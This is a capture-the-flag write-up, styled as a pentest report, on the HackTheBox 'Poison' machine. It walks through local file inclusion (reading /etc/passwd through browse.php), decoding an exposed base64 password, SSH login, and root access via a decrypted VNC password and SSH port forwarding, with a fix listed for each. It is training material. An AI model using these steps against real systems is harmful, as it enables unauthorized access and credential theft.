Poison CTF Writeup
Table of Contents
ToggleWriteup presented by Behind Security as part of the Road to OSCP series, focusing on the Poison CTF from HackTheBox.
Poison CTF
Poison CTF is a machine which focuses mainly on log poisoning and port forwarding/tunneling. The machine is running FreeBSD which presents a few challenges for novice users as many common binaries from other distros are not available.
HackTheBox
Hack The Box gives individuals, businesses and universities the tools they need to continuously improve their cybersecurity capabilities — all in one place.
Executive Summary
Introduction
This Pentest report documents the security assessment conducted on the IP address 10.10.10.84. The assessment aimed to identify vulnerabilities that could be exploited to compromise the security of the target infrastructure.
Objective
The objective of this security assessment was to identify and exploit vulnerabilities in the target's infrastructure to evaluate existing security measures and provide recommendations to mitigate the identified risks.
Requirements
- Identify vulnerabilities in the web application hosted at IP address 10.10.10.84.
- Exploit critical and moderate vulnerabilities to assess potential exposure to attacks.
- Evaluate the possibility of unauthorized access to systems and data.
High-Level Summary of Found Vulnerabilities
Web Server Enumeration
Local File Inclusion (Elevated): Local files of the system could be included by abusing a flaw in
browse.php
. To mitigate this, implement input validation and sanitize user input in thebrowse.php
script to prevent directory traversal attacks. Additionally, restrict file access to a specific directory and implement a whitelist of allowed files that can be accessed through the script.Sensitive Information Exposure (Elevated): A file (
pwdbackup.txt
) containing sensitive information was identified, base64 encoded. To improve security, avoid storing sensitive information like passwords or credentials in plain text or base64 encoding. Use encryption and secure storage methods. Implement proper access controls to restrict access to sensitive files and directories.
Initial Access - Exposed SSH Credentials
- Exposed SSH Credentials (High): Credentials for the user "charix" were decoded, allowing unauthorized SSH access. To mitigate this, immediately change the passwords for user "charix."
Post Exploitation
- LPE to root (Local Privilege Escalation to root) (Extreme):
Credentials for the root user's VNC session were discovered in
/home/charix/secret.zip
. A tool calledvncpwd
was used to decrypt the stored VNC password, enabling remote access to the system as root. To prevent this, use secure storage mechanisms and encryption for sensitive data, and review and restrict access to critical files like/home/charix/secret.zip
.
Recommendations
- Implement input validation and sanitize user input in the
browse.php
script to prevent directory traversal attacks. Restrict file access to a specific directory and implement a whitelist of allowed files. - Avoid storing sensitive information in plain text or base64 encoding. Use encryption and secure storage methods for sensitive data and implement proper access controls to restrict access to sensitive files and directories.
- Immediately change the passwords for user "charix" to prevent unauthorized SSH access.
- Securely store sensitive data such as VNC passwords using encryption. Review and restrict access to critical files to prevent unauthorized disclosure of sensitive information.
Methodology
The assessment involved service enumeration, web server enumeration, and post-exploitation activities. Vulnerabilities in local file inclusion, sensitive information exposure, exposed SSH credentials, and local privilege escalation to root were identified and exploited. Recommendations focus on improving security measures to mitigate the identified risks.
Color Legend
Console color legend:
Standard console text
Commands inputted by the pentester
Text that we want to highlight
{...} Abbreviated output for brevity
Risk Classification
Independent Challenge - 10.10.10.84
export IP=10.10.10.84
Service Enumeration
IP Address | Ports Open |
---|---|
10.10.10.84 | TCP: 22, 80 |
Web Server Enumeration
Local File Inclusion
Vulnerability Explanation: Behind Security was able to include local files of the system by abusing a flaw in browse.php
.
Vulnerability Fix:
- Input Validation: Implement input validation and sanitize user input in the
browse.php
script to prevent directory traversal attacks. - File Whitelisting: Restrict file access to a specific directory and implement a whitelist of allowed files that can be accessed through the script.
Severity: Elevated
Steps to Reproduce the Attack:
- Go to
http://10.10.10.84/browse.php?file=/etc/passwd
. You can change/etc/passwd
for any file you want.
Sensitive Information Exposure
Vulnerability Explanation: Behind Security was able to identify the presence of a file (pwdbackup.txt
) containing sensitive information, base64 encoded. Base64 is not a recommended way for storing sensitive information, as it can be easily decoded.
Vulnerability Fix:
- Secure Sensitive Information: Avoid storing sensitive information like passwords or credentials in plain text or base64 encoding. Use encryption and secure storage methods.
- Access Controls: Implement proper access controls to restrict access to sensitive files and directories.
Severity: Elevated
Steps to Reproduce the Attack:
- Get the file at
http://10.10.10.84/pwdbackup.txt
Initial Access - Exposed SSH Credentials
Vulnerability Explanation: Behind Security decoded credentials for the user "charix" and was able to log in via SSH.
Vulnerability Fix:
- Change Passwords: Immediately change the passwords for user "charix".
Severity: High
Steps to Reproduce the Attack:
- Get the contents of
http://10.10.10.84/pwdbackup.txt
- Remove the spaces and save the encoded content to a file (in this case, named "encoded.enc").
- Decode the file executing the bash script below.
- Use the decoded password to log in as "charix" via SSH:
ssh [email protected]
("charix" username can be validated by reading the/etc/passwd
file and searching for users with access tocsh
. The entry looks like this:charix:/home/charix:/bin/csh
).
Post Exploitation
LPE to root
Vulnerability Explanation: After analyzing the processes running on the machine, a VNC instance running as root stood out. Credentials for the root user's VNC session could be found when extracting the contents of /home/charix/secret.zip
(the zip file is password protected, but that isn't a big deal as it is the same password we discovered for user "charix"). The use of a specific tool to decrypt the stored VNC password enables a remote attacker to log in as root via VNC, taking complete control over the system.
Vulnerability Fix:
- Password Storage: Use secure storage mechanisms and encryption for sensitive data.
- Access Controls: Review and restrict access to critical files like
/home/charix/secret.zip
.
Severity: Extreme
Steps to Reproduce the Attack:
- Download vncpwd to your local machine and compile it (
cd vncpwd && make
), we'll use it to decrypt the stored VNC password. - Transfer
/home/charix/secret.zip
to your machine and unzip it. When prompted for a password, use the password for "charix" that we discovered before. - Set up an SSH port forward using the credentials for user "charix":
ssh -L 5901:localhost:5901 [email protected]
. - Use
./vncpwd /path/to/vnc/stored/password
to decrypt the VNC password. - Use a tool like
vncviewer
to connect to the VNC server using the decrypted password. Note that we have port forwarding active via SSH, solocalhost:5901
will be the server address.
Conclusion
We hope you have found our content on Poison CTF useful and invite you to explore more of our website to discover other interesting topics we cover. From cybersecurity to programming, we strive to provide our readers with the latest and most relevant information that can help them stay informed and ahead of the curve. We are committed to providing the best user experience to you and are open to feedback and suggestions through our contact form. Thank you for choosing Behind Security, we hope to see you again soon!
BEHIND SECURITY
Behind Security is an online platform dedicated to providing informative articles on cybersecurity, privacy, and programming.